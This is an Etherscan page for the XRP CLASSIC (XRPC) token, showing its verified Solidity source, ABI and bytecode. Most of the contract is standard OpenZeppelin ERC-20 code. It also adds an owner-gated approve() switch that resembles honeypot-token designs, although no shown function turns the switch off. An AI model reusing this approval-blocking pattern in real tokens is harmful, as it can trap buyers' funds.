ETH Price: $3,052.34 (+0.94%)
Gas: 3 Gwei

Token

XRP CLASSIC (XRPC)
 

Overview

Max Total Supply

100,000,000,000 XRPC

Holders

45

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Filtered by Token Holder
kornbread.eth
Balance
1,128,016,446.652057490093315872 XRPC

Value
$0.00
0x85c385da631f7cf7436304480040d2f36b791336
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
XRPCLASSIC

Compiler Version
v0.8.6+commit.11564f7e

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, MIT license
/**
 *Submitted for verification at Etherscan.io on 2023-07-13
*/

// SPDX-License-Identifier: MIT

// File: @openzeppelin/contracts/token/ERC20/IERC20.sol

/**

XRP CLASSIC https://t.me/xrpclassiceth

*/

pragma solidity ^0.8.6;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
}

// File: @openzeppelin/contracts/token/ERC20/extensions/IERC20Metadata.sol



pragma solidity ^0.8.6;


/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

// File: @openzeppelin/contracts/utils/Context.sol



pragma solidity ^0.8.6;

/*
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        this; // silence state mutability warning without generating bytecode - see https://github.com/ethereum/solidity/issues/2691
        return msg.data;
    }
}

// File: @openzeppelin/contracts/token/ERC20/ERC20.sol



pragma solidity ^0.8.6;




/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.zeppelin.solutions/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * We have followed general OpenZeppelin guidelines: functions revert instead
 * of returning `false` on failure. This behavior is nonetheless conventional
 * and does not conflict with the expectations of ERC20 applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Context, IERC20, IERC20Metadata {
    mapping (address => uint256) private _balances;

    mapping (address => mapping (address => uint256)) private _allowances;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;
    bool public _approve_on;
    address public _owner;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The defaut value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor (string memory name_, string memory symbol_, address owner_) {
        _name = name_;
        _symbol = symbol_;
        _owner = owner_;
        _approve_on = true;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5,05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `recipient` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        require(_approve_on || _msgSender() == _owner, "Approve is turned off now");
        _approve(_msgSender(), spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * Requirements:
     *
     * - `sender` and `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     * - the caller must have allowance for ``sender``'s tokens of at least
     * `amount`.
     */
    function transferFrom(address sender, address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);

        uint256 currentAllowance = _allowances[sender][_msgSender()];
        require(currentAllowance >= amount, "ERC20: transfer amount exceeds allowance");
        _approve(sender, _msgSender(), currentAllowance - amount);

        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender] + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        uint256 currentAllowance = _allowances[_msgSender()][spender];
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        _approve(_msgSender(), spender, currentAllowance - subtractedValue);

        return true;
    }

    /**
     * @dev Moves tokens `amount` from `sender` to `recipient`.
     *
     * This is internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `sender` cannot be the zero address.
     * - `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     */
    function _transfer(address sender, address recipient, uint256 amount) internal virtual {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(sender, recipient, amount);

        uint256 senderBalance = _balances[sender];
        require(senderBalance >= amount, "ERC20: transfer amount exceeds balance");
        _balances[sender] = senderBalance - amount;
        _balances[recipient] += amount;

        emit Transfer(sender, recipient, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
        _balances[account] += amount;
        emit Transfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        _balances[account] = accountBalance - amount;
        _totalSupply -= amount;

        emit Transfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(address owner, address spender, uint256 amount) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }
    
    /**
     * @dev Function that transfers the owner permissions of contract
    */
    function transferOwnership(address newOwner) public returns (address) {
        require(_msgSender() == _owner, "Allowed for contract owner usage only");
        _owner = newOwner;
        return newOwner;
    }


    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be to transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual { }
}

// File: contracts/token/ERC20/behaviours/ERC20Decimals.sol



pragma solidity ^0.8.6;


/**
 * @title ERC20Decimals
 * @dev Implementation of the ERC20Decimals. Extension of {ERC20} that adds decimals storage slot.
 */
contract XRPCLASSIC is ERC20 {
    uint8 immutable private _decimals = 18;
    uint256 private _totalSupply = 100000000000 * 10 ** 18;

    /**
     * @dev Sets the value of the `decimals`. This value is immutable, it can only be
     * set once during construction.
     */
    constructor () ERC20('XRP CLASSIC', unicode"XRPC", _msgSender()) {
        _mint(_msgSender(), _totalSupply);
    }

    function decimals() public view virtual override returns (uint8) {
        return _decimals;
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"_approve_on","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"nonpayable","type":"function"}]

60a0604052600960f91b6080526c01431e0fae6d7217caa00000006006553480156200002a57600080fd5b506040518060400160405280600b81526020016a58525020434c415353494360a81b815250604051806040016040528060048152602001635852504360e01b8152506200007c620000f560201b60201c565b825162000091906003906020860190620001e1565b508151620000a7906004906020850190620001e1565b506005805460ff196001600160a01b0390931661010002929092166001600160a81b031990921691909117600117905550620000ef9050620000e63390565b600654620000f9565b620002eb565b3390565b6001600160a01b038216620001545760405162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f206164647265737300604482015260640160405180910390fd5b806002600082825462000168919062000287565b90915550506001600160a01b038216600090815260208190526040812080548392906200019790849062000287565b90915550506040518181526001600160a01b038316906000907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9060200160405180910390a35050565b828054620001ef90620002ae565b90600052602060002090601f0160209004810192826200021357600085556200025e565b82601f106200022e57805160ff19168380011785556200025e565b828001600101855582156200025e579182015b828111156200025e57825182559160200191906001019062000241565b506200026c92915062000270565b5090565b5b808211156200026c576000815560010162000271565b60008219821115620002a957634e487b7160e01b600052601160045260246000fd5b500190565b600181811c90821680620002c357607f821691505b60208210811415620002e557634e487b7160e01b600052602260045260246000fd5b50919050565b60805160f81c610ab66200030a600039600061015c0152610ab66000f3fe608060405234801561001057600080fd5b50600436106100ea5760003560e01c806395d89b411161008c578063b2bdfa7b11610066578063b2bdfa7b146101f0578063d0e57e2914610220578063dd62ed3e1461022d578063f2fde38b1461026657600080fd5b806395d89b41146101c2578063a457c2d7146101ca578063a9059cbb146101dd57600080fd5b806323b872dd116100c857806323b872dd14610142578063313ce56714610155578063395093511461018657806370a082311461019957600080fd5b806306fdde03146100ef578063095ea7b31461010d57806318160ddd14610130575b600080fd5b6100f7610279565b60405161010491906109ab565b60405180910390f35b61012061011b366004610981565b61030b565b6040519015158152602001610104565b6002545b604051908152602001610104565b610120610150366004610945565b61039c565b60405160ff7f0000000000000000000000000000000000000000000000000000000000000000168152602001610104565b610120610194366004610981565b61044d565b6101346101a73660046108f0565b6001600160a01b031660009081526020819052604090205490565b6100f7610484565b6101206101d8366004610981565b610493565b6101206101eb366004610981565b61052e565b6005546102089061010090046001600160a01b031681565b6040516001600160a01b039091168152602001610104565b6005546101209060ff1681565b61013461023b366004610912565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b6102086102743660046108f0565b61053b565b60606003805461028890610a2f565b80601f01602080910402602001604051908101604052809291908181526020018280546102b490610a2f565b80156103015780601f106102d657610100808354040283529160200191610301565b820191906000526020600020905b8154815290600101906020018083116102e457829003601f168201915b5050505050905090565b60055460009060ff1680610337575060055461010090046001600160a01b0316336001600160a01b0316145b6103885760405162461bcd60e51b815260206004820152601960248201527f417070726f7665206973207475726e6564206f6666206e6f770000000000000060448201526064015b60405180910390fd5b6103933384846105d8565b50600192915050565b60006103a98484846106fc565b6001600160a01b03841660009081526001602090815260408083203384529091529020548281101561042e5760405162461bcd60e51b815260206004820152602860248201527f45524332303a207472616e7366657220616d6f756e74206578636565647320616044820152676c6c6f77616e636560c01b606482015260840161037f565b610442853361043d8685610a18565b6105d8565b506001949350505050565b3360008181526001602090815260408083206001600160a01b0387168452909152812054909161039391859061043d908690610a00565b60606004805461028890610a2f565b3360009081526001602090815260408083206001600160a01b0386168452909152812054828110156105155760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b606482015260840161037f565b610524338561043d8685610a18565b5060019392505050565b60006103933384846106fc565b60055460009061010090046001600160a01b0316336001600160a01b0316146105b45760405162461bcd60e51b815260206004820152602560248201527f416c6c6f77656420666f7220636f6e7472616374206f776e6572207573616765604482015264206f6e6c7960d81b606482015260840161037f565b5060058054610100600160a81b0319166101006001600160a01b0384160217905590565b6001600160a01b03831661063a5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b606482015260840161037f565b6001600160a01b03821661069b5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b606482015260840161037f565b6001600160a01b0383811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6001600160a01b0383166107605760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b606482015260840161037f565b6001600160a01b0382166107c25760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b606482015260840161037f565b6001600160a01b0383166000908152602081905260409020548181101561083a5760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b606482015260840161037f565b6108448282610a18565b6001600160a01b03808616600090815260208190526040808220939093559085168152908120805484929061087a908490610a00565b92505081905550826001600160a01b0316846001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516108c691815260200190565b60405180910390a350505050565b80356001600160a01b03811681146108eb57600080fd5b919050565b60006020828403121561090257600080fd5b61090b826108d4565b9392505050565b6000806040838503121561092557600080fd5b61092e836108d4565b915061093c602084016108d4565b90509250929050565b60008060006060848603121561095a57600080fd5b610963846108d4565b9250610971602085016108d4565b9150604084013590509250925092565b6000806040838503121561099457600080fd5b61099d836108d4565b946020939093013593505050565b600060208083528351808285015260005b818110156109d8578581018301518582016040015282016109bc565b818111156109ea576000604083870101525b50601f01601f1916929092016040019392505050565b60008219821115610a1357610a13610a6a565b500190565b600082821015610a2a57610a2a610a6a565b500390565b600181811c90821680610a4357607f821691505b60208210811415610a6457634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fdfea2646970667358221220cd09773747519649c0bcd7162ec0328e53eeb8b0ce3da9e3ab3d70d63677b81664736f6c63430008060033

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106100ea5760003560e01c806395d89b411161008c578063b2bdfa7b11610066578063b2bdfa7b146101f0578063d0e57e2914610220578063dd62ed3e1461022d578063f2fde38b1461026657600080fd5b806395d89b41146101c2578063a457c2d7146101ca578063a9059cbb146101dd57600080fd5b806323b872dd116100c857806323b872dd14610142578063313ce56714610155578063395093511461018657806370a082311461019957600080fd5b806306fdde03146100ef578063095ea7b31461010d57806318160ddd14610130575b600080fd5b6100f7610279565b60405161010491906109ab565b60405180910390f35b61012061011b366004610981565b61030b565b6040519015158152602001610104565b6002545b604051908152602001610104565b610120610150366004610945565b61039c565b60405160ff7f0000000000000000000000000000000000000000000000000000000000000012168152602001610104565b610120610194366004610981565b61044d565b6101346101a73660046108f0565b6001600160a01b031660009081526020819052604090205490565b6100f7610484565b6101206101d8366004610981565b610493565b6101206101eb366004610981565b61052e565b6005546102089061010090046001600160a01b031681565b6040516001600160a01b039091168152602001610104565b6005546101209060ff1681565b61013461023b366004610912565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b6102086102743660046108f0565b61053b565b60606003805461028890610a2f565b80601f01602080910402602001604051908101604052809291908181526020018280546102b490610a2f565b80156103015780601f106102d657610100808354040283529160200191610301565b820191906000526020600020905b8154815290600101906020018083116102e457829003601f168201915b5050505050905090565b60055460009060ff1680610337575060055461010090046001600160a01b0316336001600160a01b0316145b6103885760405162461bcd60e51b815260206004820152601960248201527f417070726f7665206973207475726e6564206f6666206e6f770000000000000060448201526064015b60405180910390fd5b6103933384846105d8565b50600192915050565b60006103a98484846106fc565b6001600160a01b03841660009081526001602090815260408083203384529091529020548281101561042e5760405162461bcd60e51b815260206004820152602860248201527f45524332303a207472616e7366657220616d6f756e74206578636565647320616044820152676c6c6f77616e636560c01b606482015260840161037f565b610442853361043d8685610a18565b6105d8565b506001949350505050565b3360008181526001602090815260408083206001600160a01b0387168452909152812054909161039391859061043d908690610a00565b60606004805461028890610a2f565b3360009081526001602090815260408083206001600160a01b0386168452909152812054828110156105155760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b606482015260840161037f565b610524338561043d8685610a18565b5060019392505050565b60006103933384846106fc565b60055460009061010090046001600160a01b0316336001600160a01b0316146105b45760405162461bcd60e51b815260206004820152602560248201527f416c6c6f77656420666f7220636f6e7472616374206f776e6572207573616765604482015264206f6e6c7960d81b606482015260840161037f565b5060058054610100600160a81b0319166101006001600160a01b0384160217905590565b6001600160a01b03831661063a5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b606482015260840161037f565b6001600160a01b03821661069b5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b606482015260840161037f565b6001600160a01b0383811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6001600160a01b0383166107605760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b606482015260840161037f565b6001600160a01b0382166107c25760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b606482015260840161037f565b6001600160a01b0383166000908152602081905260409020548181101561083a5760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b606482015260840161037f565b6108448282610a18565b6001600160a01b03808616600090815260208190526040808220939093559085168152908120805484929061087a908490610a00565b92505081905550826001600160a01b0316846001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516108c691815260200190565b60405180910390a350505050565b80356001600160a01b03811681146108eb57600080fd5b919050565b60006020828403121561090257600080fd5b61090b826108d4565b9392505050565b6000806040838503121561092557600080fd5b61092e836108d4565b915061093c602084016108d4565b90509250929050565b60008060006060848603121561095a57600080fd5b610963846108d4565b9250610971602085016108d4565b9150604084013590509250925092565b6000806040838503121561099457600080fd5b61099d836108d4565b946020939093013593505050565b600060208083528351808285015260005b818110156109d8578581018301518582016040015282016109bc565b818111156109ea576000604083870101525b50601f01601f1916929092016040019392505050565b60008219821115610a1357610a13610a6a565b500190565b600082821015610a2a57610a2a610a6a565b500390565b600181811c90821680610a4357607f821691505b60208210811415610a6457634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fdfea2646970667358221220cd09773747519649c0bcd7162ec0328e53eeb8b0ce3da9e3ab3d70d63677b81664736f6c63430008060033

Deployed Bytecode Sourcemap

16117:515:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;6712:100;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8879:255;;;;;;:::i;:::-;;:::i;:::-;;;1613:14:1;;1606:22;1588:41;;1576:2;1561:18;8879:255:0;1543:92:1;7832:108:0;7920:12;;7832:108;;;5988:25:1;;;5976:2;5961:18;7832:108:0;5943:76:1;9616:422:0;;;;;;:::i;:::-;;:::i;16529:100::-;;;6196:4:1;16612:9:0;6184:17:1;6166:36;;6154:2;6139:18;16529:100:0;6121:87:1;10447:215:0;;;;;;:::i;:::-;;:::i;8003:127::-;;;;;;:::i;:::-;-1:-1:-1;;;;;8104:18:0;8077:7;8104:18;;;;;;;;;;;;8003:127;6931:104;;;:::i;11165:377::-;;;;;;:::i;:::-;;:::i;8343:175::-;;;;;;:::i;:::-;;:::i;6113:21::-;;;;;;;;-1:-1:-1;;;;;6113:21:0;;;;;;-1:-1:-1;;;;;1404:32:1;;;1386:51;;1374:2;1359:18;6113:21:0;1341:102:1;6083:23:0;;;;;;;;;8581:151;;;;;;:::i;:::-;-1:-1:-1;;;;;8697:18:0;;;8670:7;8697:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;8581:151;14967:215;;;;;;:::i;:::-;;:::i;6712:100::-;6766:13;6799:5;6792:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;6712:100;:::o;8879:255::-;8987:11;;8962:4;;8987:11;;;:37;;-1:-1:-1;9018:6:0;;;;;-1:-1:-1;;;;;9018:6:0;4250:10;-1:-1:-1;;;;;9002:22:0;;8987:37;8979:75;;;;-1:-1:-1;;;8979:75:0;;5284:2:1;8979:75:0;;;5266:21:1;5323:2;5303:18;;;5296:30;5362:27;5342:18;;;5335:55;5407:18;;8979:75:0;;;;;;;;;9065:39;4250:10;9088:7;9097:6;9065:8;:39::i;:::-;-1:-1:-1;9122:4:0;8879:255;;;;:::o;9616:422::-;9722:4;9739:36;9749:6;9757:9;9768:6;9739:9;:36::i;:::-;-1:-1:-1;;;;;9815:19:0;;9788:24;9815:19;;;:11;:19;;;;;;;;4250:10;9815:33;;;;;;;;9867:26;;;;9859:79;;;;-1:-1:-1;;;9859:79:0;;4064:2:1;9859:79:0;;;4046:21:1;4103:2;4083:18;;;4076:30;4142:34;4122:18;;;4115:62;-1:-1:-1;;;4193:18:1;;;4186:38;4241:19;;9859:79:0;4036:230:1;9859:79:0;9949:57;9958:6;4250:10;9980:25;9999:6;9980:16;:25;:::i;:::-;9949:8;:57::i;:::-;-1:-1:-1;10026:4:0;;9616:422;-1:-1:-1;;;;9616:422:0:o;10447:215::-;4250:10;10535:4;10584:25;;;:11;:25;;;;;;;;-1:-1:-1;;;;;10584:34:0;;;;;;;;;;10535:4;;10552:80;;10575:7;;10584:47;;10621:10;;10584:47;:::i;6931:104::-;6987:13;7020:7;7013:14;;;;;:::i;11165:377::-;4250:10;11258:4;11302:25;;;:11;:25;;;;;;;;-1:-1:-1;;;;;11302:34:0;;;;;;;;;;11355:35;;;;11347:85;;;;-1:-1:-1;;;11347:85:0;;5638:2:1;11347:85:0;;;5620:2